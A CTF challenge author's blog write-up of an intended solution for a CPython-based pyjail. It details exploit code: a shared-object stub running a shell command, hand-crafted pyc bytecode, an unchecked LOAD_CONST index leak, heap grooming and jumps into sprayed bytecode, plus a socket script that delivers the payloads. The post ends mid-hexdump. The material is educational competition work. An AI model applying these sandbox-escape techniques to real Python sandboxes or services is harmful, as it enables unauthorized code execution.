kmh's blog

TI-1337 Plus CE: Abusing CPython internals

Feb. 7, 2021

I wrote a pyjail for DiceCTF this weekend that I was pretty proud of: TI-1337 Plus CE.

The name was a reference to my last pyjail, the TI-1337. 7 teams (out of over 1,000) solved it, all using unintended but very cool solutions. I’ll go over my approach, and briefly describe the others when relevant.

Initial analysis

Texas Instruments just released the latest iteration of their best-selling TI-1337 series: the TI-1337 Plus Color Edition!

nc dicec.tf 31337

ti1337plusce.tar.gz

The archive file contains everything needed to deploy the challenge:

  • A Dockerfile
  • A patch to CPython (the Python interpreter)
  • The script we connect to
  • A fake flag

First, let’s take a look at the Dockerfile:

# build: docker build . -t ti1337plusce
# run: docker run --rm --name ti1337plusce -p 31337:1337 ti1337plusce
# connect: nc localhost 31337
# stop: docker kill ti1337plusce
FROM python:3.9.1-slim
RUN apt-get update && apt-get install -y socat git build-essential
WORKDIR /run
RUN git clone --single-branch --branch v3.9.1 --depth 1 https://github.com/python/cpython.git
WORKDIR /run/cpython
COPY patch.diff .
RUN git apply patch.diff && ./configure --prefix=/opt/python && export COMPILE_SECRET=`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20` && make CFLAGS="-D FROZEN_SECRET=\\\"`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20`\\\" -D COMPILE_SECRET=\\\"$COMPILE_SECRET\\\"" && unset COMPILE_SECRET
RUN python3 -m pip install colr
RUN echo 1337:x:1337:1337::: >> /etc/passwd
COPY ti1337plusce.py /run
RUN chmod +x /run/ti1337plusce.py && mkdir /tmp/ti1337 && chmod 733 /tmp/ti1337
COPY flag.txt /flag.txt
RUN mv /flag.txt /flag.`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20`.txt
WORKDIR /tmp/ti1337
EXPOSE 1337
CMD while :; do socat TCP-LISTEN:1337,fork,reuseaddr,su=1337 EXEC:"/run/ti1337plusce.py"; done

A custom version of CPython is compiled with some randomized secrets passed to the C preprocessor after applying the patch. The flag is stored in a random filename, meaning a simple open('/flag.txt').read() won’t be enough, and we’ll need something closer to arbitrary code execution. Finally, the ti1337plusce.py script is served as an unprivileged user.

You can read the full server file, but I’ll give you the gist here:

  1. You enter a username, and a directory for that username is created.
  2. You enter a session name. If you choose to restore a session, the contents of the file with the session name in your user directory are loaded into code. Otherwise, code is an empty string.
  3. You enter input line-by-line, which is appended to code and then written to your session file after an empty input() call.
  4. Oh yeah, everything is rainbow.
  5. Your code is entered into an interactive session of the patched CPython binary. If the process exits with a non-zero return code, you get the message “Hey, that’s not math!” Otherwise stdout from the process is printed.

Finally, patch.diff has 2 major changes:

  • Code objects belonging to frozen modules (those serialized with marshal and compiled into CPython) have a secret filename (one of the randomized compile-time macros)
  • A large subset of CPython opcodes trigger exit(1) when the following condition is fulfilled:
if (
    (!getenv("COMPILE_SECRET") || strcmp(getenv("COMPILE_SECRET"), COMPILE_SECRET)) /* not during compilation */
    && strcmp(PyUnicode_AsUTF8(co->co_filename), FROZEN_SECRET) /* not a pre-compiled frozen module */
    && tstate->interp->runtime->initialized /* interpreter is initialized */
)

Here’s an explanation of each part:

  • Since there is some Python code run at the end of compilation, and I want the build to succeed, I set an environment variable, COMPILE_SECRET, while compiling. Because of this, leaking a string from the binary and setting the COMPILE_SECRET environment variable would be sufficient for bypassing the filter.

  • Frozen modules are also executed at the start of the Python REPL, even after the interpreter has been initialized. I used a secret filename for frozen code objects to allow arbitrary bytecode from those modules. Leaking the FROZEN_SECRET string and executing a code object with that filename would bypass the filter.

  • Before the interpreter is initialized, lots of bytecode is executed in the REPL, so the filter only applies once the runtime’s initialized field is set. Setting that field to false would also be sufficient for bypassing the filter.
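The three escape hatches can be summarized with a small Python model of the C condition. This is only an illustrative sketch: the function name and its parameters are hypothetical and do not appear in the patch.

```python
def opcode_is_filtered(env_secret, co_filename, initialized,
                       compile_secret, frozen_secret):
    """Model of the patched check: True means a banned opcode hits exit(1)."""
    # getenv() returned NULL, or the value does not match the macro.
    not_compiling = env_secret is None or env_secret != compile_secret
    # The running code object does not carry the secret frozen filename.
    not_frozen = co_filename != frozen_secret
    return bool(not_compiling and not_frozen and initialized)

# Ordinary user code after startup is filtered.
print(opcode_is_filtered(None, "pwn.py", True, "C" * 20, "F" * 20))
# A code object whose co_filename equals FROZEN_SECRET is not.
print(opcode_is_filtered(None, "F" * 20, True, "C" * 20, "F" * 20))
```

Making any one of the three clauses false is enough, which is why leaking either secret or flipping the initialized field would each defeat the filter.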

In addition to all the banned opcodes, there are some restricted ones:

case LOAD_NAME:
case STORE_NAME:
case DELETE_NAME:
case LOAD_GLOBAL:
case STORE_GLOBAL:
case DELETE_GLOBAL:
    if (PyUnicode_AsUTF8(GETITEM(names, oparg))[0] == '_') exit(1);

We can’t load, store, or delete variable names that begin with an underscore. Lots of special stuff in Python (like __builtins__) starts with an underscore, so this prevents potential non-calculator trickery.
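To see which names a snippet would trip over, the same check can be approximated from stock Python with the dis module. This is a rough sketch rather than the patch's logic: underscore_names is a hypothetical helper, and it only inspects the top-level code object.

```python
import dis

RESTRICTED = {"LOAD_NAME", "STORE_NAME", "DELETE_NAME",
              "LOAD_GLOBAL", "STORE_GLOBAL", "DELETE_GLOBAL"}

def underscore_names(code):
    """Return the names in `code` that the restricted opcodes would reject."""
    return [ins.argval for ins in dis.get_instructions(code)
            if ins.opname in RESTRICTED and str(ins.argval).startswith("_")]

print(underscore_names(compile("__builtins__", "<calc>", "single")))
print(underscore_names(compile("x = 1 + 2", "<calc>", "single")))
```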

Now let’s look at the opcodes we are allowed to use by scrolling through the Python docs. I won’t list them all out, but the notable ones are operations on variables (load, store, delete), math operations (add, divide, multiply, bitwise ops, etc.), comparison operators (!=, <, etc.), printing in the Python REPL, and import statements.

Import statements definitely stick out as dangerous. And with calculator sessions, we can write to arbitrary filenames to import from! Any self-respecting CPython nerd knows that an import statement can refer to 3 types of files: Python source code (.py), Python bytecode (.pyc), and shared libraries (.pyd, .so). I did not know an import statement could refer to a .so in your current directory before this weekend. So a solver has two options: write a shared object file (which executes machine code) to read the flag and import it, or make a pyc file that somehow bypasses the opcode filtering to read the flag and import it.
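The file types the import system will consider can be listed from a stock interpreter. This small check is not part of the challenge; the extension suffixes it prints vary by platform and build.

```python
import importlib.machinery as machinery

# Suffixes the path-based finder tries for each kind of module.
print("source:   ", machinery.SOURCE_SUFFIXES)
print("bytecode: ", machinery.BYTECODE_SUFFIXES)
print("extension:", machinery.EXTENSION_SUFFIXES)
```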

Note: There’s a lot of other analysis you could do and dead ends you’d probably hit when coming at it blind. I am presenting a highly romanticized solving experience.

Writing a simple pwn.so file seems like significantly less work, so let’s give it a shot.

[kmh@kmh ti1337]$ cat pwn.c
void PyInit_pwn() {
	system("cat /flag.*.txt");
	exit(0);
}
[kmh@kmh ti1337]$ gcc pwn.c -shared -o pwn.so
[kmh@kmh ti1337]$ python3 -c "import pwn"
cat: '/flag.*.txt': No such file or directory

Looking good!

[kmh@kmh ti1337]$ (cat - && cat pwn.so && cat -) | nc dicec.tf 31337
Welcome to the TI-1337 Plus CE!
Enter your username: kmh13377894219885
1. Start new session
2. Restore session
What would you like to do? 1
Session name: pwn
You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> > > 
>

[kmh@kmh ti1337]$

Hmmm. socat doesn’t forward stderr, so let’s try it in a local Docker container.

root@e5f303d23014:~# (cat - && cat pwn.so && cat -) | /run/ti1337plusce.py 
Welcome to the TI-1337 Plus CE!
Enter your username: kmh13377894219887
1. Start new session
2. Restore session
What would you like to do? 1
Session name: pwn
You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> > > 
> 
Traceback (most recent call last):
  File "/run/ti1337plusce.py", line 54, in <module>
    f.write(code)
UnicodeEncodeError: 'utf-8' codec can't encode character '\udca0' in position 40: surrogates not allowed

Turns out since input() returns a Python 3 string, which defaults to UTF-8 encoding, it does a fancy surrogateescape thing where bytes that are not valid UTF-8 are transformed from “\xNN” to “\uDCNN”. This is okay because code points U+D800 through U+DFFF are prohibited in UTF-8, as they are reserved for surrogate pairs in UTF-16 and don’t refer to actual characters. But when the session file in the calculator is opened with open(name, "w"), the encoding is UTF-8 without the surrogateescape error handler. Our input needs to be valid UTF-8 to avoid getting a “surrogates not allowed” error when writing. We now have two options: I continue to pretend that I knew Python could import .so files from the current directory and pursue an artisanal, hand-crafted shared object that I do not know how to make, or we dive into the bytecode solution. I’ll go with the latter.
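The mismatch between the two error handlers is easy to reproduce in isolation. The snippet below is a standalone illustration using a made-up five-byte input, not the server's code.

```python
raw = b"\x7fELF\xa0"   # 0xa0 on its own is not valid UTF-8

# Decoding with surrogateescape smuggles the bad byte through as U+DCA0.
text = raw.decode("utf-8", errors="surrogateescape")
print(repr(text))

# Encoding with the default strict handler, as a plain open(name, "w") does.
try:
    text.encode("utf-8")
except UnicodeEncodeError as exc:
    print("write would fail:", exc.reason)

# The round trip only works when the same handler is used on the way out.
print(text.encode("utf-8", errors="surrogateescape") == raw)
```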

You can check out st98’s UTF-8 ELF made with NASM here.

UTF-8 pyc files

The same UTF-8 encoding restrictions apply when we’re importing pyc files. Luckily, the file format is much simpler. Let’s generate a pyc file and check it out.

[kmh@kmh ti1337]$ echo "a = 1" > pwn.py
[kmh@kmh ti1337]$ python3 -c 'from py_compile import *; compile("pwn.py", invalidation_mode=PycInvalidationMode.UNCHECKED_HASH)'
[kmh@kmh ti1337]$ hexdump -C __pycache__/pwn.cpython-39.pyc 
00000000  61 0d 0d 0a 01 00 00 00  18 af 88 23 4b 3b 38 00  |a..........#K;8.|
00000010  e3 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000020  00 01 00 00 00 40 00 00  00 73 08 00 00 00 64 00  |.....@...s....d.|
00000030  5a 00 64 01 53 00 29 02  e9 01 00 00 00 4e 29 01  |Z.d.S.)......N).|
00000040  da 01 61 a9 00 72 03 00  00 00 72 03 00 00 00 fa  |..a..r....r.....|
00000050  06 70 77 6e 2e 70 79 da  08 3c 6d 6f 64 75 6c 65  |.pwn.py..<module|
00000060  3e 01 00 00 00 f3 00 00  00 00                    |>.........|
0000006a
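The first 16 bytes of that dump are the pyc header, which can be picked apart with struct. This is a sketch of the layout used by hash-based pyc files; the variable names are my own.

```python
import struct

# First 16 bytes of the hexdump above.
header = bytes.fromhex("610d0d0a 01000000 18af88234b3b3800")

magic, crlf, flags, source_hash = struct.unpack("<H2sI8s", header)
print(magic)               # magic number identifying the bytecode version
print(crlf)                # the two bytes after it are always "\r\n"
print(flags)               # bit 0: hash-based pyc, bit 1: check the source
print(source_hash.hex())   # only consulted when bit 1 of flags is set
```

With flags equal to 1, the file is hash-based but unchecked, so the eight hash bytes can hold anything.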

Referencing the marshal source will be useful here, as pyc files are a header followed by a marshalled code object. We’ll also want to know the basic rules behind UTF-8. UTF-8 encodes code points ranging from U+0000 to U+10FFFF, but most text you encounter will fall in the range 0 to 127, which has the same mapping as ASCII. So that files containing only those characters are not inflated, UTF-8 is a variable-length encoding in which each byte under 128 is a complete code point on its own. Bytes outside that range use their upper bits to indicate their role in a multi-byte sequence. A sequence of bytes 110xxxxx 10xxxxxx represents a code point up to U+07FF using the x bits. 1110xxxx 10xxxxxx 10xxxxxx and 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx work the same way. The relevant information for us is that a byte greater than or equal to 128 is only valid as part of such a sequence: a lead byte must be followed by the right number of 10xxxxxx continuation bytes, and a continuation byte must follow a lead byte or another continuation byte. We’ll try to stay under 128 for convenience.
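Those rules can be checked quickly by letting Python's own decoder act as the validator. The helper name is_valid_utf8 is hypothetical, and the sample byte strings are chosen only to exercise each case.

```python
def is_valid_utf8(data: bytes) -> bool:
    """True if `data` decodes under the strict UTF-8 codec."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False

# One code point from each length class: 1, 2, 3 and 4 bytes.
for ch in ("a", "\u00e9", "\u20ac", "\U0001F600"):
    print(f"U+{ord(ch):04X} -> {ch.encode('utf-8').hex(' ')}")

print(is_valid_utf8(b"\x63\x00\x7f"))  # every byte under 128
print(is_valid_utf8(b"\xc3\xa0"))      # lead byte plus one continuation byte
print(is_valid_utf8(b"\xe3\x00"))      # lead byte with no continuation bytes
print(is_valid_utf8(b"\xa0"))          # continuation byte with no lead byte
```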

The first 8 bytes in the file aren’t a problem because they’re all under 128. The next 8 can be zeroed out because they are normally used to check whether a pyc file needs to be regenerated, but we used the UNCHECKED_HASH invalidation mode and Python won’t care if they’re wrong. Next up should be our marshalled code object, but for some reason the byte, 0xe3, doesn’t match the TYPE_CODE constant in marshal.c!

#define TYPE_DICT               '{'
#define TYPE_CODE               'c'
#define TYPE_UNICODE            'u'

Closer investigation reveals that there is a FLAG_REF bit packed into the type value:

flag = code & FLAG_REF;
type = code & ~FLAG_REF;
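Applying the same split to the high type bytes in the original dump shows what each one becomes once the flag is cleared. This is a small sketch that assumes FLAG_REF is 0x80, as defined in marshal.c; strip_flag_ref is a hypothetical helper.

```python
FLAG_REF = 0x80

def strip_flag_ref(byte: int) -> int:
    """Return the marshal type code with the reference flag cleared."""
    return byte & ~FLAG_REF

# Type bytes with the high bit set that appear in the dump above.
for byte in (0xE3, 0xE9, 0xDA, 0xA9, 0xFA, 0xF3):
    type_code = strip_flag_ref(byte)
    print(f"{byte:#04x} -> {type_code:#04x} ({chr(type_code)!r})")
```

Every result is a printable ASCII character, which is what makes the stripped file UTF-8 friendly.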

That flag is ‘\x80’ and, fortunately, all the type constants are under 128. Let’s zero it out for now (change e3 to 0xe3 & ~0x80 = 0x63) and see if it causes any issues. And while we’re at it, let’s trace through the marshal code as we read the file and unmark all the other marshal types with FLAG_REF set. In this case, that is all of the bytes in the pyc greater than 127, so let’s see what happens:

[kmh@kmh ti1337]$ hexdump -C __pycache__/pwn.cpython-39.pyc 
00000000  61 0d 0d 0a 01 00 00 00  18 2f 08 23 4b 3b 38 00  |a......../.#K;8.|
00000010  63 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |c...............|
00000020  00 01 00 00 00 40 00 00  00 73 08 00 00 00 64 00  |.....@...s....d.|
00000030  5a 00 64 01 53 00 29 02  69 01 00 00 00 4e 29 01  |Z.d.S.).i....N).|
00000040  5a 01 61 29 00 72 03 00  00 00 72 03 00 00 00 7a  |Z.a).r....r....z|
00000050  06 70 77 6e 2e 70 79 5a  08 3c 6d 6f 64 75 6c 65  |.pwn.pyZ.<module|
00000060  3e 01 00 00 00 73 00 00  00 00                    |>....s....|
0000006a
[kmh@kmh ti1337]$ python3 -c "import pwn; print(pwn.a)"
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
  File "<frozen importlib._bootstrap>", line 986, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 680, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 786, in exec_module
  File "<frozen importlib._bootstrap_external>", line 918, in get_code
  File "<frozen importlib._bootstrap_external>", line 587, in _compile_bytecode
ValueError: bad marshal data (invalid reference)

Apparently those references were important… anything with that bit set is stored by marshal into a references list that can be accessed with TYPE_REF (0x72). There are two reference accesses, at 0x45 and 0x4a, both to index 3. The 4th reference generated in the original pyc is an empty tuple (a9 00), so let’s replace those references with new tuples:

[kmh@kmh ti1337]$ hexdump -C __pycache__/pwn.cpython-39.pyc 
00000000  61 0d 0d 0a 01 00 00 00  18 2f 08 23 4b 3b 38 00  |a......../.#K;8.|
00000010  63 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |c...............|
00000020  00 01 00 00 00 40 00 00  00 73 08 00 00 00 64 00  |.....@...s....d.|
00000030  5a 00 64 01 53 00 29 02  69 01 00 00 00 4e 29 01  |Z.d.S.).i....N).|
00000040  5a 01 61 29 00 29 00 29  00 7a 06 70 77 6e 2e 70  |Z.a).).).z.pwn.p|
00000050  79 5a 08 3c 6d 6f 64 75  6c 65 3e 01 00 00 00 73  |yZ.<module>....s|
00000060  00 00 00 00                                       |....|
00000064
[kmh@kmh ti1337]$ python3 -c "import pwn; print(pwn.a)"
1

Perfect. We can now write this to a session file on the calculator server, import it, and, by modifying co_code, execute arbitrary bytecode.
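The reference mechanism behind that error can be reproduced with a few hand-written marshal streams. These byte strings are minimal examples built for illustration, not excerpts from the pyc.

```python
import marshal

# ')' is TYPE_SMALL_TUPLE followed by a one-byte length: an empty tuple.
print(marshal.loads(b")\x00"))

# 'r' is TYPE_REF followed by a 4-byte index. Nothing was recorded with
# FLAG_REF beforehand, so index 3 does not exist.
try:
    marshal.loads(b"r\x03\x00\x00\x00")
except ValueError as exc:
    print(exc)

# A 2-tuple whose first item has FLAG_REF set (0xa9 = ')' | 0x80) and whose
# second item is a TYPE_REF back to it.
pair = marshal.loads(b")\x02" + b"\xa9\x00" + b"r\x00\x00\x00\x00")
print(pair)
```

Replacing each TYPE_REF with an inline copy of the object, as done above with `29 00`, sidesteps the references list entirely.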

Unrestricted bytecode execution

Our bytecode is still limited by the restrictions in the patch. If we want to do anything useful, like read the flag, we’ll need to either use memory corruption in the Python interpreter or trigger one of the conditions outlined in the analysis phase. (I have been proven wrong by justCatTheFish. We’ll carry on regardless.) Both approaches could use the same building blocks, but the second is much easier so we’ll go with that. The basic premise is that the CPython interpreter (understandably) does very few bounds checks. For example, look at the LOAD_CONST implementation:

#define PyTuple_GET_ITEM(op, i) (_PyTuple_CAST(op)->ob_item[i])
...
#define GETITEM(v, i) PyTuple_GET_ITEM((PyTupleObject *)(v), (i))
...
case TARGET(LOAD_CONST): {
    PREDICTED(LOAD_CONST);
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}

oparg is read directly from the code object, which we control through the pyc, so we can theoretically load any object with a pointer in memory if we know the offset from the consts array. FROZEN_SECRET is stored inside PyUnicodeObjects in frozen code objects (see patch.diff). If we load one of those and leak it with PRINT_EXPR (the opcode the Python REPL uses for printing values), we can use it as the co_filename property in the marshalled code object of our pyc and gain access to every opcode.

Let’s hop in GDB and pray the offset is consistent! Fortunately, all empty tuples reference the same Python object, and frozen code objects are unmarshalled early in CPython’s launch, so as long as our consts array is an empty tuple, the addresses are entirely determined before user code is run and the offset will stay the same between runs.
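The shared empty tuple is a CPython implementation detail that can be observed from Python itself. A quick sanity check, not taken from the challenge:

```python
import marshal

a = ()
b = tuple()
c = marshal.loads(b")\x00")   # an empty tuple produced by unmarshalling

# In CPython all three names refer to one shared object, so its address
# does not depend on anything our own code allocates.
print(a is b, b is c)
```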

First we’ll get the address of a frozen function:

gef➤  r -S -i
Starting program: /home/kmh/Development/angstromctf/problems/2020/misc/ti1337plusce/cpython/python -S -i
Python 3.9.1 (tags/v3.9.1-dirty:1e5d33e, Feb  5 2021, 14:02:33) 
[GCC 10.2.0] on linux
>>> from _frozen_importlib import module_from_spec
>>> module_from_spec
<function module_from_spec at 0x7f75fe544d30>

Then we’ll get the address of a pointer to its filename object:

gef➤  p &((PyCodeObject*)((PyFunctionObject*)0x7f75fe544d30)->func_code)->co_filename
$1 = (PyObject **) 0x7f75fe534a38

Now we can break at the opcode evaluation function, where we access the empty tuple object through the co_names field and calculate the number of indices the filename pointer is away from the ob_item array:

gef➤  b _PyEval_EvalFrameDefault
Breakpoint 1 at 0x5555555ad800: file Python/ceval.c, line 919.
gef➤  c
Continuing.
>>> 1
[#0] Id 1, Name: "python", stopped 0x562a16f9c640 in _PyEval_EvalFrameDefault (), reason: BREAKPOINT
gef➤  p/d (0x7f75fe534a38 - (long)((PyTupleObject*)f->f_code->co_names)->ob_item)/8
$2 = -19652

This means that LOAD_CONST, when consts is an empty tuple, has a reference to a PyUnicodeObject containing FROZEN_SECRET at index -19652. So we need to execute the bytecode LOAD_CONST (-19652); PRINT_EXPR. Unfortunately, oparg is stored as a 4-byte integer, but each instruction carries only a single-byte argument, so we will need to use the EXTENDED_ARG opcode, which is defined as a constant greater than 127. We could still maybe figure something out since UTF-8 doesn’t ban bytes over 127; it just has special requirements. But -19652 is 0xffffb33c, and 0xff can never appear in UTF-8. If you reread my brief encoding explanation or check Wikipedia you’ll see that every valid byte contains a 0 bit.
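To make the encoding problem concrete, here is a sketch of how the instruction bytes fall out of that index. The opcode numbers are the CPython 3.9 values (PRINT_EXPR, number 70, is the REPL's print opcode); the encode helper is hypothetical.

```python
# Opcode numbers from CPython 3.9's opcode.h.
EXTENDED_ARG, LOAD_CONST, PRINT_EXPR, RETURN_VALUE = 144, 100, 70, 83

def encode(opcode: int, arg: int = 0) -> bytes:
    """Encode one instruction, adding EXTENDED_ARG prefixes for wide args."""
    arg &= 0xFFFFFFFF                                   # 32-bit two's complement
    parts = arg.to_bytes(4, "big").lstrip(b"\x00") or b"\x00"
    prefix = b"".join(bytes([EXTENDED_ARG, b]) for b in parts[:-1])
    return prefix + bytes([opcode, parts[-1]])

payload = encode(LOAD_CONST, -19652) + encode(PRINT_EXPR) + encode(RETURN_VALUE)
print(payload.hex(" "))

try:
    payload.decode("utf-8")
except UnicodeDecodeError as exc:
    print("not UTF-8:", exc.reason)
```

The 0x90 and 0xff bytes rule out sending this sequence through the session file directly, so it has to reach memory some other way.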

Fortunately there are mechanisms for storing bytes in memory without inputting them directly. The simplest is bytestrings:

gef➤  r
Starting program: /run/cpython/python -S -i
Python 3.9.1 (tags/v3.9.1-dirty:1e5d33e, Feb  5 2021, 19:35:48) 
[GCC 8.3.0] on linux
>>> a = b'\xff\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff'
gef➤  search-pattern 0xfffdfffbfff9fff7fff5fff3fff1
[+] Searching '\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff' in memory
[+] In (0x7f857336a000-0x7f857346a000), permission=rw-
  0x7f8573389979 - 0x7f85733899b1  →   "\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff[...]" 
  0x7f85733a2559 - 0x7f85733a2591  →   "\xf1\xff\xf3\xff\xf5\xff\xf7\xff\xf9\xff\xfb\xff\xfd\xff[...]" 

We can abuse another bytecode operation without bounds checks: jumps.

#define JUMPTO(x)       (next_instr = first_instr + (x) / sizeof(_Py_CODEUNIT))
...
case TARGET(JUMP_ABSOLUTE): {
    PREDICTED(JUMP_ABSOLUTE);
    JUMPTO(oparg);
    ...
}

To make this useful, we need our evil bytecode, inputted as a bytestring, to be at a predictable offset from our code object so we can reliably jump into it. This is more complicated than finding the offset between the empty tuple and FROZEN_SECRET because it relies on the allocations in code we input. After banging my head a bit, I realized the unmarshalling of a code object allocates a PyBytesObject for the bytecode, which is the same object used by bytestrings. I can allocate a bunch of bytestrings with my evil bytecode:

A0 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A1 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A2 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
...
A97 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A98 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"
A99 = b"\x90\xff\x90\xff\x90\xb3\x64\x3c\x46\x00\x53\x00\xff\xff\xff\xff"

And then free half of them:

del A0
del A2
del A4
...
del A94
del A96
del A98

The allocated bytestrings will be mostly sequential in memory, so the heap might look like this:

<evil bytecode>
<chunk in freelist>
<evil bytecode>
<chunk in freelist>
...
<chunk in freelist>
<evil bytecode>

Even if there are some intermediate allocations, it is very likely that another buffer of the same length as our evil bytecode (in this case, 16 bytes) would use a freed chunk in front of one of the buffers we want to jump into. So if we unmarshal a code object whose co_code is 16 bytes long, we should have a constant offset. The exact value of the offset depends on metadata and implementation details, but checking in GDB shows it to be 0x40 bytes. After following the allocate/free procedure above and importing a pyc file with JUMP_ABSOLUTE (0x40), we’ve successfully leaked FROZEN_SECRET:

import uuid
import socket
import re

u = bytes(str(uuid.uuid4()).replace("-", ""), encoding="utf-8")

def run(session, code, option=b"1"):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("dicec.tf", 31337))
	s.sendall(u+b"\n")
	s.sendall(option+b"\n")
	s.sendall(session+b"\n")
	s.sendall(code+b"\n")
	r = True
	output = ""
	while r:
		r = s.recv(4096)
		output += r.decode("utf-8")
	return output

run(b"a.py", b"1+1\n")
run(b"b", b"import a\n2+2\n")
run(b"c.py", b"a = 1337\n")
run(b"__pycache__/c.cpython-39.pyc", open("payload.pyc", "rb").read()+b"\n")
leak = run(b"d", b"\n".join('A{} = b"{}"'.format(i, '\\x90\\xff\\x90\\xff\\x90\\xb3\\x64\\x3c\\x46\\x00\\x53\\x00'+'\\xff'*4).encode("utf-8") for i in range(100))+b"\n"+b"\n".join("del A{}".format(i).encode("utf-8") for i in range(0, 100, 2))+b"\n"+b"import c\n")
frozen = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])').sub('', leak).split("'")[1]
print(frozen)
ErBT0ksQUDyGuWIT42Bw
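The 0x40 offset seen in GDB is consistent with how CPython's small-object allocator would size a 16-byte bytes object. The arithmetic below is a back-of-the-envelope sketch: the header layout and the 16-byte size classes are my assumptions about a 64-bit CPython 3.9 build, not something taken from the challenge files.

```python
HEADER = 8 + 8 + 8 + 8   # ob_refcnt, ob_type, ob_size, ob_shash (64-bit, assumed)
ALIGNMENT = 16           # assumed granularity of the allocator's size classes

def block_size(payload_len: int) -> int:
    """Bytes a bytes object of this length would occupy in its pool."""
    needed = HEADER + payload_len + 1          # +1 for the trailing NUL byte
    return -(-needed // ALIGNMENT) * ALIGNMENT  # round up to the alignment

print(hex(block_size(16)))
```

If two such objects sit in adjacent blocks, their data areas are one block size apart, which would explain a jump target of 0x40.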

A couple details I skipped over: I created the __pycache__ folder by importing a py file (which it turns out isn’t necessary since you can import pwn.pyc with import pwn) and removed the rainbow ANSI escape codes with a regex from Stack Overflow.

We can now change co_filename to be the leaked string in a pyc file, upload that as flag.pyc, and then do import flag. You actually can’t overwrite a file in __pycache__ for this because the import machinery rewrites co_filename for you based on the source path.
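Outside the UTF-8 constraint, producing a pyc with a chosen co_filename takes only a few lines. This is a minimal sketch, not the method used for the actual payload: build_pyc is a hypothetical helper, and its output would still need its FLAG_REF bytes stripped by hand as described earlier.

```python
import importlib.util
import marshal

def build_pyc(source: str, filename: str) -> bytes:
    """Compile `source` and wrap it in an unchecked hash-based pyc."""
    code = compile(source, "placeholder.py", "exec")
    code = code.replace(co_filename=filename)        # needs Python 3.8+
    # Header: magic, flags = 1 (hash-based, unchecked), 8 unused hash bytes.
    header = importlib.util.MAGIC_NUMBER + (1).to_bytes(4, "little") + bytes(8)
    return header + marshal.dumps(code)

pyc = build_pyc("a = 1337", "ErBT0ksQUDyGuWIT42Bw")
print(marshal.loads(pyc[16:]).co_filename)
```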

Another way to leak

ALLES! found another fun way to leak co_filename of a frozen code object (I’ve dumped their payload from the server):

>>> dis.dis(marshal.loads(open("jdxvpDpUMSmJhoNpToLJ.pyc", "rb").read()[16:]))
  1           0 LOAD_CONST               0 (0)
              2 LOAD_CONST               1 (None)
              4 IMPORT_NAME              0 (sys)
              6 STORE_NAME               0 (sys)

  3           8 LOAD_NAME                0 (sys)
             10 IMPORT_FROM              1 (last_traceback)
             12 IMPORT_FROM              2 (tb_next)
             14 IMPORT_FROM              3 (tb_frame)
             16 IMPORT_FROM              4 (f_code)
             18 IMPORT_FROM              5 (co_filename)
             20 STORE_GLOBAL             6 (a)
             22 LOAD_CONST               1 (None)
             24 RETURN_VALUE

Turns out IMPORT_FROM is just LOAD_ATTR in disguise!

static PyObject *
import_from(PyThreadState *tstate, PyObject *v, PyObject *name)
{
    PyObject *x;

    if (_PyObject_LookupAttr(v, name, &x) != 0) {
        return x;
    }
    ...

And it’s easy to trigger an exception in a frozen module by importing something that doesn’t exist, which can then be accessed through sys.last_traceback:

import aa
from jdxvpDpUMSmJhoNpToLJ import a
a

Their full solution code is available here. I could have prevented this solution by disallowing IMPORT_FROM, but then the inclusion of IMPORT_NAME becomes even more contrived, and this is a cool piece of trivia, so I have no regrets.
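The IMPORT_FROM behaviour is easy to confirm in a stock interpreter. The example below uses math purely as a convenient module; it is not related to the ALLES! payload.

```python
import dis
import math

# "from module import name" compiles to IMPORT_NAME followed by IMPORT_FROM.
code = compile("from math import __dict__ as ns", "<demo>", "exec")
opnames = [ins.opname for ins in dis.get_instructions(code)]
print("IMPORT_FROM" in opnames)

# IMPORT_FROM is an attribute lookup, so it is not limited to public names.
from math import __dict__ as ns
print(ns is vars(math))
```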

Finishing up

Now that we have unrestricted bytecode execution, it should be as simple as import os; os.system("cat /flag.*"), right? Wrong!

[kmh@kmh ~]$ nc dicec.tf 31337
Welcome to the TI-1337 Plus CE!
Enter your username: kmh13377894219885
1. Start new session
2. Restore session
What would you like to do? 1
Session name: 1
You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> import os
> 
Hey, that's not math!

Code in os still hits the opcode filtering switch statement. Fortunately, CPython comes with a bunch of modules written in C that don’t go through the Python interpreter. One of these is posix, which implements most of the functionality of os. Here’s the final pyc:

00000000  61 0d 0d 0a 01 00 00 00  00 00 00 00 00 00 00 00  |a...............|
00000010  63 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |c...............|
00000020  00 03 00 00 00 40 00 00  00 73 1a 00 00 00 64 00  |.....@...s....d.|
00000030  64 01 6c 00 5a 00 65 00  09 c3 a0 01 64 02 09 c3  |d.l.Z.e.....d...|
